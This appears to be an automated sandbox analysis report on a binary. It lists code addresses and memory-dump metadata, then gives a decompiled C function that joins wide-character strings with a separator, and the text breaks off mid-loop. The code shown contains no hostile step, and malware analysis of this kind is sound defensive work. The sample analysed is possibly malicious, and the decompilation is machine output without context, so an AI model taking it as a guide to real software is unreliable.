0x0041d3d9
0x0041d3db
0x00000000
0x00000000
0x00000000
0x0041d3db
0x00000000
0x0041d3d0
0x0041d231
0x0041d239
0x0041d23b
0x0041d23c
0x0041d23e
0x0041d240
0x0041d244
0x0041d246
0x0041d246
0x0041d248
0x0041d977
0x0041d924
0x0041d924
0x0041d928
0x0041d2cb
0x0041d2d0
0x0041d2d0
0x0041d2d3
0x0041d2d6
0x0041d2d9
0x0041d2dd
0x0041d368
0x0041d36d
0x0041d36f
0x0041d373
0x0041d378
0x0041d382
0x0041d384
0x0041d386
0x00000000
0x00000000
0x0041d388
0x0041d38b
0x0041d38d
0x0041d5fd
0x0041d5ff
0x00000000
0x00000000
0x0041d607
0x0041d607
0x0041d60a
0x0041d626
0x0041d62a
0x0041d636
0x0041d636
0x0041d63c
0x0041d63c
0x0041d641
0x0041d645
0x0041d649
0x0041d64b
0x00000000
0x00000000
0x0041d651
0x0041d654
0x0041d656
0x00000000
0x00000000
0x0041d658
0x0041d65e
0x0041d671
0x0041d671
0x0041d676
0x0041d676
0x0041d678
0x0041d958
0x0041d701
0x0041d701
0x0041d701
0x0041d705
0x0041d707
0x0041d730
0x0041d733
0x0041d736
0x0041d73a
0x0041d7e1
0x0041d7e1
0x0041d7e3
0x0041d7e5
0x0041d919
0x0041d919
0x0041d91d
0x0041d91f
0x0041d920
0x0041d922
0x0041d92f
0x0041d934
0x0041d936
0x00000000
0x0041d936
0x00000000
0x0041d922
0x0041d7eb
0x0041d7ee
0x0041d7ee
0x0041d7f0
0x0041d81c
0x0041d81c
0x0041d81e
0x0041d820
0x0041d829
0x0041d85c
0x0041d85c
0x0041d860
0x0041d862
0x0041d865
0x0041d866
0x0041d868
0x0041d252
0x0041d254
0x0041d254
0x0041d257
0x0041d277
0x0041d27b
0x0041d287
0x0041d287
0x0041d28d
0x0041d28d
0x0041d292
0x0041d296
0x0041d29a
0x0041d29c
0x00000000
0x00000000
0x0041d2a2
0x0041d2a5
0x0041d2a7
0x00000000
0x00000000
0x0041d2a9
0x0041d2af
0x0041d2c6
0x0041d2c6
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d2b1
0x0041d2b1
0x0041d2b5
0x0041d2b7
0x00000000
0x00000000
0x0041d2bd
0x0041d2be
0x0041d2c4
0x00000000
0x00000000
0x00000000
0x0041d2c4
0x0041d8c6
0x0041d8c6
0x0041d8c9
0x0041d8d1
0x0041d8d1
0x00000000
0x0041d8c9
0x0041d96b
0x0041d970
0x00000000
0x0041d970
0x0041d259
0x0041d25b
0x0041d25d
0x00000000
0x00000000
0x0041d264
0x0041d264
0x0041d266
0x0041d266
0x0041d26a
0x0041d26c
0x00000000
0x00000000
0x0041d272
0x0041d273
0x0041d275
0x00000000
0x00000000
0x00000000
0x0041d275
0x00000000
0x0041d266
0x0041d93e
0x0041d895
0x0041d897
0x0041d899
0x00000000
0x0041d899
0x0041d82b
0x0041d82b
0x0041d833
0x0041d837
0x0041d83b
0x0041d83f
0x0041d83f
0x0041d843
0x0041d847
0x0041d849
0x00000000
0x00000000
0x0041d84b
0x0041d84b
0x0041d84f
0x0041d850
0x0041d852
0x00000000
0x00000000
0x00000000
0x0041d852
0x0041d854
0x0041d858
0x00000000
0x0041d858
0x0041d822
0x00000000
0x0041d822
0x0041d7f2
0x0041d7f6
0x0041d7f6
0x0041d7f8
0x0041d7fc
0x0041d7fc
0x0041d7fd
0x0041d804
0x0041d807
0x0041d809
0x00000000
0x00000000
0x0041d80e
0x0041d810
0x0041d812
0x00000000
0x00000000
0x00000000
0x0041d812
0x0041d814
0x0041d818
0x00000000
0x0041d818
0x0041d740
0x0041d74a
0x0041d74d
0x0041d74d
0x0041d752
0x0041d75a
0x0041d75a
0x0041d75a
0x0041d75b
0x0041d765
0x0041d76f
0x0041d773
0x0041d774
0x0041d778
0x0041d77d
0x0041d781
0x0041d783
0x0041d786
0x0041d788
0x0041d7da
0x0041d7dc
0x00000000
0x0041d78a
0x0041d78a
0x0041d78c
0x0041d7bd
0x0041d7bd
0x0041d7bf
0x0041d7c0
0x0041d7c4
0x0041d7c8
0x0041d7cd
0x0041d7d1
0x0041d7d5
0x0041d7df
0x0041d7df
0x00000000
0x0041d7df
0x0041d78e
0x0041d791
0x0041d794
0x0041d796
0x00000000
0x00000000
0x0041d798
0x0041d79c
0x0041d79c
0x0041d79e
0x0041d79e
0x0041d79f
0x0041d7a4
0x0041d7a9
0x0041d7ab
0x00000000
0x00000000
0x0041d7ad
0x0041d7b1
0x0041d7b5
0x0041d7b7
0x00000000
0x00000000
0x00000000
0x0041d7b7
0x0041d7b9
0x00000000
0x0041d7b9
0x0041d788
0x0041d709
0x0041d70b
0x0041d90e
0x0041d913
0x0041d724
0x0041d724
0x00000000
0x0041d724
0x00000000
0x0041d913
0x0041d711
0x0041d713
0x0041d716
0x0041d71b
0x00000000
0x00000000
0x0041d71d
0x00000000
0x0041d71d
0x0041d680
0x0041d680
0x0041d683
0x0041d6ac
0x0041d6b0
0x0041d6bc
0x0041d6c0
0x0041d6c0
0x0041d6c5
0x0041d6c5
0x0041d6ca
0x0041d6ce
0x0041d6d2
0x0041d6d4
0x00000000
0x00000000
0x0041d6da
0x0041d6dd
0x0041d6df
0x00000000
0x00000000
0x0041d6e1
0x0041d6e5
0x0041d6ea
0x0041d6fc
0x0041d6fc
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d6ec
0x0041d6ec
0x0041d6f0
0x0041d6f2
0x00000000
0x00000000
0x0041d6f4
0x0041d6f5
0x0041d6fa
0x00000000
0x00000000
0x00000000
0x0041d6fa
0x00000000
0x0041d6ec
0x0041d948
0x0041d94b
0x0041d94d
0x0041d951
0x00000000
0x0041d951
0x0041d685
0x0041d687
0x0041d68a
0x00000000
0x00000000
0x0041d691
0x0041d691
0x0041d693
0x0041d697
0x0041d69b
0x0041d69d
0x00000000
0x00000000
0x0041d6a3
0x0041d6a4
0x0041d6a6
0x00000000
0x00000000
0x0041d6a8
0x00000000
0x0041d6a8
0x0041d905
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d660
0x0041d660
0x0041d664
0x0041d666
0x00000000
0x00000000
0x0041d668
0x0041d669
0x0041d66f
0x00000000
0x00000000
0x00000000
0x0041d66f
0x00000000
0x0041d660
0x0041d95f
0x0041d964
0x00000000
0x0041d964
0x0041d60c
0x0041d60e
0x0041d610
0x00000000
0x00000000
0x0041d617
0x0041d617
0x0041d619
0x0041d619
0x0041d61d
0x0041d61f
0x00000000
0x00000000
0x0041d621
0x0041d622
0x0041d624
0x00000000
0x00000000
0x00000000
0x0041d624
0x00000000
0x0041d619
0x00000000
0x0041d38d
0x0041d2ed
0x0041d2f0
0x0041d2f0
0x0041d2f6
0x0041d2fe
0x0041d2fe
0x0041d2fe
0x0041d301
0x0041d306
0x0041d310
0x0041d314
0x0041d315
0x0041d31a
0x0041d31d
0x0041d31f
0x0041d361
0x0041d363
0x00000000
0x0041d321
0x0041d321
0x0041d323
0x0041d34c
0x0041d34c
0x0041d34e
0x0041d34f
0x0041d353
0x0041d358
0x0041d35c
0x0041d366
0x0041d366
0x00000000
0x0041d366
0x0041d325
0x0041d328
0x0041d32b
0x0041d32d
0x00000000
0x00000000
0x0041d32f
0x0041d32f
0x0041d331
0x0041d331
0x0041d332
0x0041d337
0x0041d33c
0x0041d33e
0x00000000
0x00000000
0x0041d340
0x0041d344
0x0041d348
0x0041d34a
0x00000000
0x00000000
0x00000000
0x0041d34a
0x00000000
0x0041d331
0x0041d31f
0x0041d24e
0x00000000
0x0041d393
0x0041d393
0x0041d395
0x0041d396
0x0041d396
0x0041d39e
0x00000000
0x0041d39e
0x0041d0d3
0x0041d0d5
0x00000000
0x00000000
0x0041d0dd
0x0041d0dd
0x0041d0e0
0x0041d107
0x0041d10b
0x0041d117
0x0041d117
0x0041d11d
0x0041d121
0x0041d123
0x0041d123
0x0041d128
0x0041d12c
0x0041d130
0x0041d132
0x00000000
0x00000000
0x0041d138
0x0041d13b
0x0041d13d
0x00000000
0x00000000
0x0041d13f
0x0041d143
0x0041d146
0x0041d14e
0x0041d168
0x0041d168
0x0041d170
0x0041d179
0x0041d17c
0x0041d17f
0x0041d182
0x0041d184
0x0041d1a8
0x0041d1ab
0x0041d1ab
0x0041d1b1
0x0041d1b9
0x0041d1b9
0x0041d1b9
0x0041d1bc
0x0041d1c1
0x0041d1cb
0x0041d1cf
0x0041d1d0
0x0041d1d4
0x0041d1d9
0x0041d1dd
0x0041d1e2
0x0041d1e4
0x0041d1e7
0x0041d1eb
0x0041d1f7
0x0041d1f7
0x0041d1fa
0x0041d1fb
0x0041d1fe
0x0041d200
0x00000000
0x00000000
0x0041d202
0x0041d204
0x0041d87f
0x0041d881
0x0041d884
0x0041d888
0x0041d88c
0x0041d88c
0x0041d88f
0x00000000
0x00000000
0x00000000
0x0041d88f
0x0041d20a
0x0041d20a
0x0041d20c
0x0041d8a1
0x0041d8a4
0x00000000
0x0041d8a4
0x0041d1f1
0x0041d1f4
0x0041d1f4
0x0041d1f4
0x0041d1f7
0x0041d186
0x0041d188
0x0041d18b
0x00000000
0x00000000
0x0041d191
0x00000000
0x0041d191
0x0041d150
0x0041d150
0x0041d154
0x0041d158
0x0041d15a
0x00000000
0x00000000
0x0041d160
0x0041d161
0x0041d166
0x00000000
0x00000000
0x00000000
0x0041d166
0x0041d8aa
0x00000000
0x0041d8aa
0x0041d8b3
0x0041d8ba
0x0041d8bd
0x00000000
0x0041d8bd
0x0041d0e2
0x0041d0e4
0x0041d0e8
0x0041d0ea
0x00000000
0x00000000
0x0041d0f1
0x0041d0f1
0x0041d0f3
0x0041d0f7
0x0041d0f9
0x00000000
0x00000000
0x0041d0ff
0x0041d100
0x0041d102
0x00000000
0x00000000
0x00000000
0x0041d104
0x0041d873
0x0041d877
0x00000000
0x0041d877
0x0041d05a
0x0041d061
0x0041d063
0x0041d06b
0x0041d06d
0x0041d070
0x0041d074
0x0041d0ae
0x0041d0b0
0x0041d0b3
0x0041d0b3
0x0041d0b5
0x00000000
0x0041d0b5
0x0041d078
0x0041d0a1
0x0041d0a1
0x0041d0a3
0x0041d0a4
0x0041d0a9
0x00000000
0x0041d0a9
0x0041d07a
0x0041d07d
0x0041d082
0x00000000
0x00000000
0x0041d084
0x0041d086
0x0041d086
0x0041d087
0x0041d08c
0x0041d093
0x00000000
0x00000000
0x0041d095
0x0041d099
0x0041d09f
0x00000000
0x00000000
0x00000000
0x0041d09f
0x00000000

Strings

@, xrefs: 0041D90E

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction ID: 9f0ea93ef4b462a2828cfb8a48ed10074616b53e1b5a87b45538772b122135b2
Opcode Fuzzy Hash: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction Fuzzy Hash: 4F42F8F1E0471196C7188F29C4412AB73E2AFD5754F29872ED8AA97394EB38DCC18789

Uniqueness

Uniqueness Score: -1.00%

Function 004289F0, Relevance: 2.0, Strings: 1, Instructions: 748
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E004289F0(intOrPtr* __ecx, signed int* _a4, signed int _a8) {
				unsigned int _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _t205;
				signed int* _t207;
				signed int _t211;
				unsigned int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t223;
				intOrPtr* _t224;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t253;
				signed int _t258;
				signed int _t261;
				signed int _t262;
				unsigned int _t271;
				signed int _t277;
				void* _t278;
				signed int _t279;
				signed int _t280;
				short* _t283;
				signed int _t285;
				signed int _t286;
				intOrPtr* _t292;
				signed short* _t295;
				signed int* _t296;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				unsigned int _t309;
				signed int _t310;
				signed int _t313;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				void* _t322;
				signed int _t323;
				void* _t324;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				unsigned int _t341;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t350;
				intOrPtr _t352;
				intOrPtr* _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				void* _t358;
				signed int _t359;
				signed int _t360;
				signed int* _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t374;
				unsigned int _t381;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t385;
				intOrPtr* _t386;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t401;
				unsigned int _t403;
				signed int _t404;
				signed short* _t405;
				signed int _t406;
				signed int _t407;
				signed int _t414;
				intOrPtr* _t419;
				signed int _t420;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				unsigned int _t431;
				signed int _t433;
				signed int _t439;
				signed int* _t441;
				signed int* _t442;
				signed int _t444;
				void* _t446;
				void* _t448;

				_push(_t298);
				_t446 = (_t444 & 0xfffffff0) - 0x24;
				_t419 = __ecx;
				_t352 =  *__ecx;
				if(_t352 != 0) {
					_t318 =  *( *( *(__ecx + 4)));
					__eflags = _t318;
					if(_t318 == 0) {
						L34:
						_push(0x80);
						_t299 = E00411030();
						_t446 = _t446 + 4;
						__eflags =  *_t419 - 1;
						 *_t299 = 0;
						if( *_t419 <= 1) {
							goto L45;
						} else {
							_t374 = 0x40;
							goto L36;
						}
					} else {
						__eflags =  *_t318 & 0x0000ffff;
						if(( *_t318 & 0x0000ffff) == 0) {
							goto L34;
						} else {
							_t277 = _t318 & 0x0000000f;
							__eflags = _t277;
							if(_t277 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t414 =  ~( ~_t277 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t414;
								while(1) {
									asm("movdqu xmm1, [ecx+eax*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t298;
									if(_t298 != 0) {
										break;
									}
									_t277 = _t277 + 8;
									__eflags = _t277 - _t414;
									if(_t277 < _t414) {
										continue;
									} else {
										__eflags = _t414 - 0x7fffffff;
										if(_t414 >= 0x7fffffff) {
											goto L22;
										} else {
											goto L20;
										}
									}
									goto L23;
								}
								asm("bsf edi, ebx");
								_t414 = (_t414 >> 1) + _t277;
							} else {
								_t414 = 0;
								__eflags = _t277 & 0x00000001;
								if((_t277 & 0x00000001) != 0) {
									while(1) {
										L20:
										__eflags =  *(_t318 + _t414 * 2) & 0x0000ffff;
										if(( *(_t318 + _t414 * 2) & 0x0000ffff) == 0) {
											goto L23;
										}
										_t414 = _t414 + 1;
										__eflags = _t414 - 0x7fffffff;
										if(_t414 < 0x7fffffff) {
											continue;
										} else {
											L22:
											_t414 = 0x7fffffff;
										}
										goto L23;
									}
								} else {
									_t277 =  ~_t277 + 0x10 >> 1;
									__eflags = _t277;
									while(1) {
										_t298 =  *(_t318 + _t414 * 2) & 0x0000ffff;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L23;
										}
										_t414 = _t414 + 1;
										__eflags = _t414 - _t277;
										if(_t414 < _t277) {
											continue;
										} else {
											goto L16;
										}
										goto L23;
									}
								}
							}
							L23:
							_t23 = _t414 + 1; // 0x80000000
							_t278 = _t23;
							__eflags = _t278 - 0x40;
							_t279 =  <=  ? 0x40 : _t278;
							__eflags = _t279;
							if(_t279 > 0) {
								_t309 = (_t279 >> 5 >> 0x1a) + _t279 >> 6;
								_t280 = _t279 & 0x8000003f;
								__eflags = _t280;
								if(_t280 < 0) {
									_t280 = (_t280 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t280;
								}
								__eflags = _t280;
								_t310 = _t309 + (0 | _t280 > 0x00000000);
								_push(_t310 << 7);
								_v36 = _t310 << 6;
								_v52 = _t318;
								_t283 = E00411030();
								_t350 = _v52;
								_t374 = _v36;
								_v48 = _t283;
								_t446 = _t446 + 4;
								_v40 = _t283;
								_v44 = 0;
								 *_t283 = 0;
								_v28 = _t419;
								_v52 =  *_t419;
								_t313 = _v44;
								_t441 = _v48;
								while(1) {
									_t285 =  *_t350 & 0x0000ffff;
									_t313 = _t313 + 1;
									 *_t441 = _t285;
									__eflags = _t414;
									if(_t414 == 0) {
										goto L32;
									}
									__eflags = _t313 - _t414;
									if(_t313 == _t414) {
										_v48 = _t441;
										__eflags = 0;
										_t299 = _v40;
										_t286 = _v52;
										_t419 = _v28;
										_t441[0] = 0;
									} else {
										goto L32;
									}
									L177:
									__eflags = _t286 - 1;
									if(_t286 > 1) {
										goto L36;
									} else {
										goto L178;
									}
									goto L89;
									L32:
									__eflags = _t285;
									if(_t285 == 0) {
										_t299 = _v40;
										_t286 = _v52;
										_t419 = _v28;
									} else {
										_t441 =  &(_t441[0]);
										_t350 = _t350 + 2;
										__eflags = _t350;
										continue;
									}
									goto L177;
								}
							} else {
								_t299 = 0;
								__eflags = _t352 - 1;
								if(_t352 <= 1) {
									L45:
									_t353 = _a4;
									 *_t353 = 0;
									 *((intOrPtr*)(_t353 + 4)) = 0;
									__eflags = _t299;
									if(_t299 == 0) {
										goto L80;
									} else {
										goto L46;
									}
								} else {
									_t374 = 0;
									L36:
									_t223 = _a8 & 0x0000ffff;
									_t403 = 1;
									_v36 = _t374;
									asm("pxor xmm0, xmm0");
									do {
										__eflags = _t223;
										if(_t223 == 0) {
											_v28 = _t419;
										} else {
											__eflags = _t299;
											if(_t299 == 0) {
												_v28 = _t419;
												L182:
												_t425 = 0;
											} else {
												_v28 = _t419;
												L151:
												_t248 = _t299 & 0x0000000f;
												__eflags = _t248;
												if(_t248 == 0) {
													L156:
													asm("pxor xmm1, xmm1");
													_t439 =  ~( ~_t248 + 0x00000007 & 0x00000007) + 0x7fffffff;
													__eflags = _t439;
													while(1) {
														asm("movdqu xmm0, [ebx+eax*2]");
														asm("pcmpeqw xmm0, xmm1");
														asm("pmovmskb edx, xmm0");
														__eflags = _t374;
														if(_t374 != 0) {
															break;
														}
														_t248 = _t248 + 8;
														__eflags = _t248 - _t439;
														if(_t248 < _t439) {
															continue;
														} else {
															__eflags = _t439 - 0x7fffffff;
															if(_t439 >= 0x7fffffff) {
																goto L162;
															} else {
																goto L160;
															}
														}
														goto L163;
													}
													asm("bsf esi, edx");
													_t425 = (_t439 >> 1) + _t248;
													goto L191;
												} else {
													_t439 = 0;
													__eflags = _t248 & 0x00000001;
													if((_t248 & 0x00000001) != 0) {
														while(1) {
															L160:
															__eflags =  *(_t299 + _t439 * 2) & 0x0000ffff;
															if(( *(_t299 + _t439 * 2) & 0x0000ffff) == 0) {
																goto L191;
															}
															_t439 = _t439 + 1;
															__eflags = _t439 - 0x7fffffff;
															if(_t439 < 0x7fffffff) {
																continue;
															} else {
																L162:
																_t425 = 0x7fffffff;
															}
															goto L163;
														}
														goto L191;
													} else {
														_t248 =  ~_t248 + 0x10 >> 1;
														__eflags = _t248;
														while(1) {
															_t374 =  *(_t299 + _t439 * 2) & 0x0000ffff;
															__eflags = _t374;
															if(_t374 == 0) {
																break;
															}
															_t439 = _t439 + 1;
															__eflags = _t439 - _t248;
															if(_t439 < _t248) {
																continue;
															} else {
																goto L156;
															}
															goto L163;
														}
														L191:
														__eflags = _t425 - 0xfffffffe;
														if(_t425 == 0xfffffffe) {
															 *_t299 = 0;
														}
													}
												}
											}
											L163:
											_t158 = _t425 + 2; // -2147483652
											_t324 = _t158;
											__eflags = _t324 - 0x40;
											_t325 =  <=  ? 0x40 : _t324;
											__eflags = _t325 - _v36;
											if(_t325 > _v36) {
												_t381 = (_t325 >> 5 >> 0x1a) + _t325 >> 6;
												_t326 = _t325 & 0x8000003f;
												__eflags = _t326;
												if(_t326 < 0) {
													_t326 = (_t326 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t326;
												}
												__eflags = _t326;
												_t382 = _t381 + (0 | _t326 > 0x00000000);
												_v36 = _t382 << 6;
												_push(_t382 << 7);
												_t384 = E00411030();
												_t446 = _t446 + 4;
												__eflags = _t299;
												if(_t299 == 0) {
													__eflags = 0;
													 *_t384 = 0;
												} else {
													__eflags = _t384;
													if(_t384 != 0) {
														_t242 =  *_t299 & 0x0000ffff;
														 *_t384 = _t242;
														__eflags = _t242;
														if(_t242 != 0) {
															_t243 = 0;
															__eflags = 0;
															while(1) {
																_t243 = _t243 + 1;
																_t329 =  *(_t299 + _t243 * 4 - 2) & 0x0000ffff;
																 *(_t384 + _t243 * 4 - 2) = _t329;
																__eflags = _t329;
																if(_t329 == 0) {
																	goto L172;
																}
																_t330 =  *(_t299 + _t243 * 4) & 0x0000ffff;
																 *(_t384 + _t243 * 4) = _t330;
																__eflags = _t330;
																if(_t330 != 0) {
																	continue;
																}
																goto L172;
															}
														}
													}
													L172:
													_push(2);
													_push(_t299);
													_v48 = _t384;
													E004110B0();
													_t384 = _v48;
													_t446 = _t446 + 8;
												}
												_t299 = _t384;
											}
											 *((short*)(_t299 + _t425 * 2)) = _a8 & 0x0000ffff;
											 *((short*)(_t299 + 2 + _t425 * 2)) = 0;
											while(1) {
												L41:
												_t224 = _v28;
												_t323 =  *( *((intOrPtr*)(_t224 + 4)) + _t403 * 4);
												_t374 =  *_t323;
												__eflags = _t374;
												if(_t374 == 0) {
													break;
												}
												__eflags =  *_t374 & 0x0000ffff;
												if(( *_t374 & 0x0000ffff) != 0) {
													__eflags = _t374 - _t299;
													if(_t374 == _t299) {
														goto L43;
													} else {
														_t227 = _t374 & 0x0000000f;
														__eflags = _t227;
														if(_t227 == 0) {
															L96:
															asm("pxor xmm1, xmm1");
															_t431 =  ~( ~_t227 + 0x00000007 & 0x00000007) + 0x7fffffff;
															__eflags = _t431;
															while(1) {
																asm("movdqu xmm0, [edx+eax*2]");
																asm("pcmpeqw xmm0, xmm1");
																asm("pmovmskb ecx, xmm0");
																__eflags = _t323;
																if(_t323 != 0) {
																	break;
																}
																_t227 = _t227 + 8;
																__eflags = _t227 - _t431;
																if(_t227 < _t431) {
																	continue;
																} else {
																	__eflags = _t431 - 0x7fffffff;
																	if(_t431 >= 0x7fffffff) {
																		goto L102;
																	} else {
																		goto L100;
																	}
																}
																goto L103;
															}
															asm("bsf esi, ecx");
															_t433 = (_t431 >> 1) + _t227;
														} else {
															_t433 = 0;
															__eflags = _t227 & 0x00000001;
															if((_t227 & 0x00000001) != 0) {
																while(1) {
																	L100:
																	__eflags =  *(_t374 + _t433 * 2) & 0x0000ffff;
																	if(( *(_t374 + _t433 * 2) & 0x0000ffff) == 0) {
																		goto L103;
																	}
																	_t433 = _t433 + 1;
																	__eflags = _t433 - 0x7fffffff;
																	if(_t433 < 0x7fffffff) {
																		continue;
																	} else {
																		L102:
																		_t433 = 0x7fffffff;
																	}
																	goto L103;
																}
															} else {
																_t227 =  ~_t227 + 0x10 >> 1;
																__eflags = _t227;
																while(1) {
																	_t323 =  *(_t374 + _t433 * 2) & 0x0000ffff;
																	__eflags = _t323;
																	if(_t323 == 0) {
																		goto L103;
																	}
																	_t433 = _t433 + 1;
																	__eflags = _t433 - _t227;
																	if(_t433 < _t227) {
																		continue;
																	} else {
																		goto L96;
																	}
																	goto L103;
																}
															}
														}
														L103:
														__eflags = _t299;
														if(_t299 == 0) {
															_t228 = 0;
														} else {
															_t346 = _t299 & 0x0000000f;
															__eflags = _t346;
															if(_t346 == 0) {
																L110:
																asm("pxor xmm1, xmm1");
																_v24 = _t403;
																_t228 =  ~( ~_t346 + 0x00000007 & 0x00000007) + 0x7fffffff;
																__eflags = _t228;
																while(1) {
																	asm("movdqu xmm0, [ebx+ecx*2]");
																	asm("pcmpeqw xmm0, xmm1");
																	asm("pmovmskb edi, xmm0");
																	__eflags = _t403;
																	if(_t403 != 0) {
																		break;
																	}
																	_t346 = _t346 + 8;
																	__eflags = _t346 - _t228;
																	if(_t346 < _t228) {
																		continue;
																	} else {
																		_t403 = _v24;
																		__eflags = _t228 - 0x7fffffff;
																		if(_t228 >= 0x7fffffff) {
																			goto L116;
																		} else {
																			goto L114;
																		}
																	}
																	goto L117;
																}
																asm("bsf eax, eax");
																_t271 = _t403 >> 1;
																_t403 = _v24;
																_t228 = _t271 + _t346;
															} else {
																_t228 = 0;
																__eflags = _t346 & 0x00000001;
																if((_t346 & 0x00000001) != 0) {
																	while(1) {
																		L114:
																		__eflags =  *(_t299 + _t228 * 2) & 0x0000ffff;
																		if(( *(_t299 + _t228 * 2) & 0x0000ffff) == 0) {
																			goto L117;
																		}
																		_t228 = _t228 + 1;
																		__eflags = _t228 - 0x7fffffff;
																		if(_t228 < 0x7fffffff) {
																			continue;
																		} else {
																			L116:
																			_t228 = 0x7fffffff;
																		}
																		goto L117;
																	}
																} else {
																	_t346 =  ~_t346 + 0x10 >> 1;
																	__eflags = _t346;
																	_v24 = _t403;
																	while(1) {
																		__eflags =  *(_t299 + _t228 * 2) & 0x0000ffff;
																		if(( *(_t299 + _t228 * 2) & 0x0000ffff) == 0) {
																			break;
																		}
																		_t228 = _t228 + 1;
																		__eflags = _t228 - _t346;
																		if(_t228 < _t346) {
																			continue;
																		} else {
																			_t403 = _v24;
																			goto L110;
																		}
																		goto L117;
																	}
																	_t403 = _v24;
																}
															}
														}
														L117:
														_t105 = _t228 + 1; // 0x80000000
														_t229 = _t433 + _t105;
														__eflags = _t229;
														if(_t229 != 0) {
															__eflags = _t229 - 0x40;
															_t230 =  <=  ? 0x40 : _t229;
															__eflags = _t230 - _v36;
															if(_t230 > _v36) {
																goto L123;
															}
															goto L135;
														} else {
															__eflags = _t299;
															if(_t299 == 0) {
																__eflags = _v36 - 0x40;
																if(_v36 < 0x40) {
																	goto L121;
																} else {
																	goto L187;
																}
															} else {
																_t334 = 0;
																 *_t299 = 0;
																__eflags = _v36 - 0x40;
																if(_v36 < 0x40) {
																	L121:
																	_t230 = 0x40;
																	L123:
																	_t341 = (_t230 >> 5 >> 0x1a) + _t230 >> 6;
																	_t253 = _t230 & 0x8000003f;
																	__eflags = _t253;
																	if(_t253 < 0) {
																		_t253 = (_t253 - 0x00000001 | 0xffffffc0) + 1;
																		__eflags = _t253;
																	}
																	__eflags = _t253;
																	_t342 = _t341 + (0 | _t253 > 0x00000000);
																	_v36 = _t342 << 6;
																	_push(_t342 << 7);
																	_v32 = _t374;
																	_t258 = E00411030();
																	_t374 = _v32;
																	_t344 = _t258;
																	_t446 = _t446 + 4;
																	__eflags = _t299;
																	if(_t299 == 0) {
																		__eflags = 0;
																		 *_t344 = 0;
																	} else {
																		__eflags = _t344;
																		if(_t344 != 0) {
																			_t261 =  *_t299 & 0x0000ffff;
																			 *_t344 = _t261;
																			__eflags = _t261;
																			if(_t261 != 0) {
																				_v24 = _t403;
																				_t262 = 0;
																				__eflags = 0;
																				while(1) {
																					_t262 = _t262 + 1;
																					_t406 =  *(_t299 + _t262 * 4 - 2) & 0x0000ffff;
																					 *(_t344 + _t262 * 4 - 2) = _t406;
																					__eflags = _t406;
																					if(_t406 == 0) {
																						break;
																					}
																					_t407 =  *(_t299 + _t262 * 4) & 0x0000ffff;
																					 *(_t344 + _t262 * 4) = _t407;
																					__eflags = _t407;
																					if(_t407 != 0) {
																						continue;
																					}
																					break;
																				}
																				_t403 = _v24;
																			}
																		}
																		_push(2);
																		_push(_t299);
																		_v52 = _t344;
																		_v32 = _t374;
																		E004110B0();
																		_t374 = _v32;
																		_t344 = _v52;
																		_t446 = _t446 + 8;
																	}
																	_t299 = _t344;
																	L135:
																	_t231 = _t299;
																	__eflags = _t299;
																	if(_t299 == 0) {
																		L187:
																		_t403 = _t403 + 1;
																		__eflags = _t403 -  *_v28;
																		if(_t403 >=  *_v28) {
																			_t385 = _a4;
																			 *_t385 = 0;
																			 *((intOrPtr*)(_t385 + 4)) = 0;
																			goto L80;
																		} else {
																			__eflags = _a8 & 0x0000ffff;
																			if((_a8 & 0x0000ffff) != 0) {
																				goto L182;
																			} else {
																				continue;
																			}
																			goto L198;
																		}
																	} else {
																		_t334 =  *_t299 & 0x0000ffff;
																		goto L137;
																	}
																} else {
																	_t231 = _t299;
																	L137:
																	__eflags = _t334;
																	if(_t334 != 0) {
																		_v32 = _t374;
																		_t336 = 0;
																		__eflags = 0;
																		_v24 = _t403;
																		while(1) {
																			_t336 = _t336 + 1;
																			_t405 = _t299 + _t336 * 4;
																			_t231 = _t405 - 2;
																			__eflags =  *(_t405 - 2) & 0x0000ffff;
																			if(( *(_t405 - 2) & 0x0000ffff) == 0) {
																				break;
																			}
																			_t231 = _t405;
																			__eflags =  *_t405 & 0x0000ffff;
																			if(( *_t405 & 0x0000ffff) != 0) {
																				continue;
																			}
																			break;
																		}
																		_t374 = _v32;
																		_t403 = _v24;
																	}
																	_t335 = _t231;
																	__eflags = _t433;
																	if(__eflags != 0) {
																		if(__eflags > 0) {
																			goto L145;
																		}
																	} else {
																		_t433 = 0x7fffffff;
																		L145:
																		_v44 = 0;
																		_v24 = _t403;
																		_v40 = _t299;
																		_t404 = _v44;
																		while(1) {
																			_t303 =  *(_t374 + _t404 * 2) & 0x0000ffff;
																			 *(_t335 + _t404 * 2) = _t303;
																			__eflags = _t303;
																			if(_t303 == 0) {
																				break;
																			}
																			_t146 = _t404 * 2; // 0x2
																			_t231 = _t335 + _t146 + 2;
																			_t404 = _t404 + 1;
																			__eflags = _t404 - _t433;
